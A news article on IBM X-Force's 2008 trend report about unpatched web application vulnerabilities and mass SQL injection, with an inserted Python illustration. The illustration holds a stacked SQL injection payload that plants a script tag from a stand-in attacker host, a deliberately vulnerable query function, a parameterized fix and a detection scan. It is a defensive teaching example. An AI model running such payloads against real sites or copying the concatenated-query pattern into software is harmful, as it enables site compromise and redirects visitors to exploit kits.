IBM: Unpatched applications threaten users

Many corporations run off-the-shelf applications riddled with unpatched vulnerabilities, or custom web applications carrying unpatched vulnerabilities of their own, according to a new research report from IBM ISS.

In fact, of all web application vulnerabilities disclosed during 2008, 74 percent had no patch available, according to the annual X-Force Trend and Risk Report, released Monday. The study also found that attackers have turned their focus to new types of exploits, such as malicious links to Adobe Flash and PDF documents.

Moreover, during the fourth quarter of 2008 alone, IBM traced a 50 percent increase in the number of malicious URLs hosting exploits, more than it found in all of 2007, according to the report. The large-scale, automated SQL injection attacks that emerged early last year have continued unabated: by the end of 2008, the volume of attacks had jumped to 30 times the number initially seen last summer.

“Attackers are building SQL injection code into automated tools that scan for vulnerable websites, putting in redirects to malicious servers, or trying to incorporate malware into corporate web sites,” said Holly Stewart, X-Force threat response manager for IBM Internet Security Systems.

IBM claims that 50 percent of all vulnerabilities discovered during the past three years still have no patch available today. That translates into a large number of vulnerable web sites.

“The purpose of these automated attacks is to deceive and redirect web surfers to web browser exploit toolkits,” said Kris Lamb, senior operations manager, X-Force Research and Development for IBM ISS. “It is staggering that we still see SQL injection attacks in widespread use without adequate patching almost 10 years after they were first disclosed.”
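As an added illustration, not code from the IBM report or from this article, the following Python script models the attack pattern Stewart and Lamb describe: a product lookup that pastes a request parameter into its SQL, a stacked UPDATE that appends a script tag pointing at an attacker-controlled host to every stored description (the mechanism by which an injected site redirects visitors to a browser exploit kit), the parameterized replacement, and a scan of stored content for script tags loaded from untrusted hosts. The table layout, the host evil.example, the trusted host www.example.com and the driver emulation that runs stacked statements are all assumptions made for the demo.

```python
import re
import sqlite3
from urllib.parse import urlparse

# Constructed sample payload in the style of the automated SQL injection
# campaigns the article describes: a stacked UPDATE that appends a script tag
# pointing at an attacker-controlled host (evil.example is a placeholder, not a
# real indicator) to every product description on the site.
PAYLOAD = (
    "1; UPDATE products SET description = description || "
    "'<script src=\"http://evil.example/t.js\"></script>'"
)

# Matches <script ... src="http(s)://host/..."> and captures the URL.
SCRIPT_SRC = re.compile(r'<script[^>]+src=["\']?(https?://[^"\'\s>]+)', re.I)


def make_db() -> sqlite3.Connection:
    """Build a constructed in-memory catalogue standing in for a corporate site's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT);
        INSERT INTO products VALUES (1, 'Widget', 'A fine widget');
        INSERT INTO products VALUES (2, 'Gadget', 'A handy gadget');
        """
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, product_id: str):
    """Vulnerable: the request parameter is concatenated straight into the SQL text.

    sqlite3's execute() refuses stacked statements, so this splits on ';' to
    emulate a database driver that runs them (an assumption made for the demo).
    """
    sql = "SELECT name, description FROM products WHERE id = " + product_id
    cur = conn.cursor()
    rows = []
    for stmt in sql.split(";"):
        stmt = stmt.strip()
        if not stmt:
            continue
        cur.execute(stmt)
        if stmt.upper().startswith("SELECT"):
            rows = cur.fetchall()
    conn.commit()
    return rows


def lookup_safe(conn: sqlite3.Connection, product_id: str):
    """Hardened: validate the type, then bind the value; no SQL text is built from input."""
    pid = int(product_id)  # raises ValueError for anything that is not an integer
    cur = conn.execute("SELECT name, description FROM products WHERE id = ?", (pid,))
    return cur.fetchall()


def find_injected_scripts(conn: sqlite3.Connection, trusted_hosts: set):
    """Detection: (row id, host) for every stored script tag that loads from an untrusted host."""
    hits = []
    for pid, desc in conn.execute("SELECT id, description FROM products"):
        for m in SCRIPT_SRC.finditer(desc or ""):
            host = urlparse(m.group(1)).hostname
            if host not in trusted_hosts:
                hits.append((pid, host))
    return hits


def demo():
    """Run the payload through the vulnerable path, then scan the stored content."""
    conn = make_db()
    lookup_vulnerable(conn, PAYLOAD)
    return find_injected_scripts(conn, {"www.example.com"})


if __name__ == "__main__":
    for pid, host in demo():
        print(f"product {pid}: script loaded from untrusted host {host}")
```

The fix is the combination of type validation and parameter binding in lookup_safe; the payload is rejected before any query runs. Because a mass injection leaves its script tag in the stored data, find_injected_scripts is the kind of check a site owner can run against the database to find out whether the site is already serving a redirect to an exploit kit.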

For the report, IBM looked back at application vulnerabilities disclosed in the past three years and checked whether vendors had fixed them, comparing the number of disclosed vulnerabilities with the number of patches vendors had made available to fix them.

“A vendor does not always release a patch when a vulnerability is disclosed by independent researchers around the world,” Stewart said. “So even if users wanted to fix the software, vendors have not always provided a way for it to be done.”
